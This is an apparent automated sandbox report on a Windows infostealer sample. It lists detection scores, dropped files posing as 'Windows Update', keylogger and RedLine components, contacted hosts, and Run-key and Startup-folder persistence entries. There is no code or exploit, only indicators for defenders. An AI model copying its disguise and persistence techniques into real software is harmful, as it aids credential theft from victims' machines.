33->136 140 3 other signatures 33->140 47 vbc.exe 33->47         started        50 dw20.exe 33->50         started        52 vbc.exe 33->52         started        54 vbc.exe 33->54         started        56 conhost.exe 35->56         started        58 conhost.exe 37->58         started        60 conhost.exe 39->60         started        file12 signatures13 process14 signatures15 62 conhost.exe 45->62         started        142 Tries to harvest and steal browser information (history, passwords, etc) 47->142 process16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Hpdyv8oO3j.exe74%MetadefenderBrowse
                  Hpdyv8oO3j.exe100%ReversingLabsWin32.Trojan.VBinder
                  Hpdyv8oO3j.exe100%AviraHEUR/AGEN.1114177
                  Hpdyv8oO3j.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\ViRuS.exe100%AviraTR/Agent.32768.2190
                  C:\Windows\SysWOW64\user32dll.exe100%AviraTR/Agent.32768.2190
                  C:\Users\user\AppData\Roaming\RedLine.exe100%AviraBDS/Bladabindi.ajooc
                  C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%AviraTR/AD.MExecute.lzrac
                  C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%AviraSPR/Tool.MailPassView.473
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exe100%AviraBDS/Bladabindi.ajooc
                  C:\Users\user\AppData\Roaming\Windows Update.exe100%AviraTR/AD.MExecute.lzrac
                  C:\Users\user\AppData\Roaming\Windows Update.exe100%AviraSPR/Tool.MailPassView.473
                  C:\Users\user\AppData\Local\Temp\Keylogger.exe100%AviraTR/AD.MExecute.lzrac
                  C:\Users\user\AppData\Local\Temp\Keylogger.exe100%AviraSPR/Tool.MailPassView.473
                  C:\Users\user\AppData\Local\Temp\hhzclipper.exe100%AviraHEUR/AGEN.1134703
                  C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe100%AviraBDS/Bladabindi.ajooc
                  C:\Users\user\AppData\Local\Temp\ViRuS.exe100%Joe Sandbox ML
                  C:\Windows\SysWOW64\user32dll.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\RedLine.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Windows Update.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Keylogger.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\hhzclipper.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe89%ReversingLabsByteCode-MSIL.Backdoor.Ratenjay
                  C:\Users\user\AppData\Local\Temp\ViRuS.exe83%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\ViRuS.exe93%ReversingLabsWin32.Worm.Changeup
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exe89%ReversingLabsByteCode-MSIL.Backdoor.Ratenjay
                  C:\Users\user\AppData\Roaming\RedLine.exe89%ReversingLabsByteCode-MSIL.Backdoor.Ratenjay
                  C:\Windows\SysWOW64\user32dll.exe83%MetadefenderBrowse
                  C:\Windows\SysWOW64\user32dll.exe93%ReversingLabsWin32.Worm.Changeup

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  2.0.Keylogger.exe.760000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                  2.0.Keylogger.exe.760000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                  28.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1125438Download File
                  0.0.Hpdyv8oO3j.exe.400000.0.unpack100%AviraHEUR/AGEN.1140785Download File
                  28.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1125438Download File
                  0.2.Hpdyv8oO3j.exe.400000.0.unpack100%AviraHEUR/AGEN.1140785Download File
                  19.0.user32dll.exe.400000.0.unpack100%AviraTR/Agent.32768.2190Download File
                  17.0.Windows Update.exe.d40000.8.unpack100%AviraTR/AD.MExecute.lzracDownload File
                  17.0.Windows Update.exe.d40000.8.unpack100%AviraSPR/Tool.MailPassView.473Download File
                  19.2.user32dll.exe.400000.0.unpack100%AviraTR/Agent.32768.2190Download File
                  17.2.Windows Update.exe.d40000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                  17.2.Windows Update.exe.d40000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                  16.2.RedLine.exe.580000.0.unpack100%AviraBDS/Bladabindi.ajoocDownload File
                  28.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1125438Download File
                  4.2.RedLine.MainPanel-cracked.exe.2b3af40.5.unpack100%AviraHEUR/AGEN.1110362Download File
                  17.0.Windows Update.exe.d40000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                  17.0.Windows Update.exe.d40000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                  3.2.hhzclipper.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1134703Download File
                  28.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1125438Download File
                  28.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                  5.0.RedLine.MainPanel-cracked.exe.340000.0.unpack100%AviraBDS/Bladabindi.ajoocDownload File
                  0.3.Hpdyv8oO3j.exe.708218.1.unpack100%AviraTR/Agent.32768.2190Download File
                  4.0.RedLine.MainPanel-cracked.exe.550000.0.unpack100%AviraBDS/Bladabindi.ajoocDownload File
                  28.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                  17.0.Windows Update.exe.d40000.12.unpack100%AviraTR/AD.MExecute.lzracDownload File
                  17.0.Windows Update.exe.d40000.12.unpack100%AviraSPR/Tool.MailPassView.473Download File
                  3.0.hhzclipper.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1134703Download File
                  4.2.RedLine.MainPanel-cracked.exe.550000.0.unpack100%AviraBDS/Bladabindi.ajoocDownload File
                  2.2.Keylogger.exe.760000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                  2.2.Keylogger.exe.760000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                  5.2.RedLine.MainPanel-cracked.exe.340000.0.unpack100%AviraBDS/Bladabindi.ajoocDownload File
                  17.0.Windows Update.exe.d40000.4.unpack100%AviraTR/AD.MExecute.lzracDownload File
                  17.0.Windows Update.exe.d40000.4.unpack100%AviraSPR/Tool.MailPassView.473Download File
                  16.0.RedLine.exe.580000.0.unpack100%AviraBDS/Bladabindi.ajoocDownload File
                  8.2.ViRuS.exe.400000.0.unpack100%AviraTR/Agent.32768.2190Download File
                  8.0.ViRuS.exe.400000.0.unpack100%AviraTR/Agent.32768.2190Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://crl.pki.goog/gsr1/gsr1.crl0;0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://crls.pki.goog/gts1c3/moVDfISia2k.crl00%URL Reputationsafe
                  https://Esteamcommunity.com/tradeoffer/new/0%Avira URL Cloudsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.fontbureau.comceu0%Avira URL Cloudsafe
                  http://pki.goog/repo/certs/gtsr1.der040%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.de0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt0%URL Reputationsafe
                  http://www.zhongyicts.com.cnz0%Avira URL Cloudsafe
                  http://www.fontbureau.comasuq/w0%Avira URL Cloudsafe
                  http://go.microsoft.0%URL Reputationsafe
                  http://crl.pki.goog/gtsr1/gtsr1.crl0W0%URL Reputationsafe
                  http://pki.goog/gsr1/gsr1.crt020%URL Reputationsafe
                  https://pki.goog/repository/00%URL Reputationsafe
                  http://go.microsoft.LinkId=421270%Avira URL Cloudsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cna0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.zhongyicts.com.cno.0%URL Reputationsafe
                  http://www.zhongyicts.com.cnT0%Avira URL Cloudsafe
                  https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=68560%Avira URL Cloudsafe
                  http://pki.goog/repo/certs/gts1c3.der00%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  whatismyipaddress.com
                  104.16.155.36
                  truefalse
                    high
                    smtp.gmail.com
                    173.194.79.109
                    truefalse
                      high
                      231.58.0.0.in-addr.arpa
                      unknown
                      unknownfalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://whatismyipaddress.com/false
                          high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.fontbureau.com/designersGKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                            high
                            http://crl.pki.goog/gsr1/gsr1.crl0;Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/?Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bTheKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers?Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                high
                                http://crls.pki.goog/gts1c3/moVDfISia2k.crl0Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://Esteamcommunity.com/tradeoffer/new/hhzclipper.exe, 00000003.00000000.315938270.00000000001E2000.00000002.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngvbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.tiro.comKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designersKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.goodfont.co.krKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://menejelv.beget.tech/user32dll.exe, 00000013.00000003.356248617.00000000006CA000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.comceuKeylogger.exe, 00000002.00000003.345653581.00000000054A0000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpfalse
                                        high
                                        http://pki.goog/repo/certs/gtsr1.der04Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sajatypeworks.comKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.google.com/chrome/vbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.typography.netDKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cn/cTheKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://fontfabrik.comKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96evbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpfalse
                                            high
                                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.msn.com/?ocid=iehpvbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpfalse
                                                high
                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://whatismyipaddress.com/-Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmpfalse
                                                    high
                                                    http://www.galapagosdesign.com/DPleaseKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://login.yahoo.com/config/loginKeylogger.exe, Windows Update.exe, vbc.exefalse
                                                      high
                                                      http://www.fonts.comKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.sandoll.co.krKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.site.com/logs.phpWindows Update.exe, 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0vbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.urwpp.deDPleaseKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.nirsoft.net/vbc.exe, vbc.exe, 0000001C.00000000.394707935.0000000000400000.00000040.00000001.sdmpfalse
                                                              high
                                                              http://www.urwpp.deKeylogger.exe, 00000002.00000003.322374520.00000000054B1000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.zhongyicts.com.cnKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmp, Keylogger.exe, 00000002.00000003.318514651.00000000054B2000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.sakkal.comKeylogger.exe, 00000002.00000003.319800118.00000000054D6000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmp, Keylogger.exe, 00000002.00000003.318472330.00000000054B0000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.fontbureau.comKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtvbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.zhongyicts.com.cnzKeylogger.exe, 00000002.00000003.318514651.00000000054B2000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.fontbureau.comasuq/wKeylogger.exe, 00000002.00000003.345653581.00000000054A0000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://go.microsoft.Keylogger.exe, 00000002.00000002.346733504.0000000000E49000.00000004.00000020.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://crl.pki.goog/gtsr1/gtsr1.crl0WWindows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://whatismyipaddress.comWindows Update.exe, 00000011.00000002.400895126.000000000381D000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.com/designersnoKeylogger.exe, 00000002.00000003.326372691.00000000054AE000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://pki.goog/gsr1/gsr1.crt02Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://pki.goog/repository/0Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://go.microsoft.LinkId=42127Keylogger.exe, 00000002.00000002.346733504.0000000000E49000.00000004.00000020.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        http://www.carterandcone.comlKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.msn.com/de-ch/?ocid=iehpvbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://www.fontbureau.com/designers/cabarga.htmlNKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.founder.com.cn/cnKeylogger.exe, 00000002.00000003.317599242.00000000054B4000.00000004.00000001.sdmp, Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.fontbureau.com/designers/frere-jones.htmlKeylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://www.zhongyicts.com.cnaKeylogger.exe, 00000002.00000003.318514651.00000000054B2000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.jiyu-kobo.co.jp/Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.zhongyicts.com.cno.Keylogger.exe, 00000002.00000003.318514651.00000000054B2000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.fontbureau.com/designers8Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://www.google.com/accounts/serviceloginKeylogger.exe, Windows Update.exe, vbc.exefalse
                                                                                      high
                                                                                      http://www.zhongyicts.com.cnTKeylogger.exe, 00000002.00000003.318514651.00000000054B2000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gvbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856vbc.exe, 0000001C.00000003.409677270.000000000081D000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://pki.goog/repo/certs/gts1c3.der0Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown

                                                                                        Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.16.154.36
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        173.194.79.108
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        173.194.79.109
                                                                                        smtp.gmail.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        104.16.155.36
                                                                                        whatismyipaddress.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        82.202.167.226
                                                                                        unknownRussian Federation
                                                                                        29182THEFIRST-ASRUfalse

                                                                                        Private

                                                                                        IP
                                                                                        192.168.2.1
                                                                                        127.0.0.1

                                                                                        General Information

                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                        Analysis ID:524274
                                                                                        Start date:18.11.2021
                                                                                        Start time:10:12:40
                                                                                        Joe Sandbox Product:CloudBasic
                                                                                        Overall analysis duration:0h 15m 17s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:light
                                                                                        Sample file name:Hpdyv8oO3j.exe
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                        Number of analysed new started processes analysed:49
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • HDC enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.adwa.spyw.evad.winEXE@53/24@7/7
                                                                                        EGA Information:Failed
                                                                                        HDC Information:
                                                                                        • Successful, ratio: 9.1% (good quality ratio 7.9%)
                                                                                        • Quality average: 60.6%
                                                                                        • Quality standard deviation: 33%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 96%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 0
                                                                                        Cookbook Comments:
                                                                                        • Adjust boot time
                                                                                        • Enable AMSI
                                                                                        • Found application associated with file extension: .exe
                                                                                        Warnings:
                                                                                        Show All
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                        • TCP Packets have been reduced to 100
                                                                                        • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.42.73.29, 104.208.16.94
                                                                                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/524274/sample/Hpdyv8oO3j.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        10:13:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
                                                                                        10:14:15API Interceptor56x Sleep call for process: Windows Update.exe modified
                                                                                        10:14:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 61bc7bd88d10e97264127fe545415b17 "C:\Users\user\AppData\Roaming\RedLine.exe" ..
                                                                                        10:14:25API Interceptor2x Sleep call for process: dw20.exe modified
                                                                                        10:14:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                        10:14:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 61bc7bd88d10e97264127fe545415b17 "C:\Users\user\AppData\Roaming\RedLine.exe" ..
                                                                                        10:14:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                        10:14:53AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 61bc7bd88d10e97264127fe545415b17 "C:\Users\user\AppData\Roaming\RedLine.exe" ..
                                                                                        10:15:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exe
                                                                                        10:15:30API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        No context

                                                                                        Domains

                                                                                        No context

                                                                                        ASN

                                                                                        No context

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_windows update.e_88669d6d392fdabab3f150c24b7e9ac915a06366_00000000_10d37750\Report.wer
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.402933249166855
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:7Z82iVXa6nzCr69+k/NRWsX1OzviHk0KHvI7Dp7/u7s7S274It:l82+aMVbovhOt7/u7s7X4It
                                                                                        MD5:5CE90DFC6068FC01BFAF7F151CF34B16
                                                                                        SHA1:886CA7A3E79ECF401FAED7EF174A6591C06AE700
                                                                                        SHA-256:70A3B65501A1CC41F26C156B4154A0D735D4ED9A6225AA1FDF5EE688D667442C
                                                                                        SHA-512:CFBF12F5A9D85813D2F21F370488A5B43BF9B96ADC2200E8F59D7CCD24AB62D887B4DE1A63704798DE80CAE01E7170D3A9D19080E7F2A42DD609EEC5D27AC996
                                                                                        Malicious:false
                                                                                        Reputation:unknown
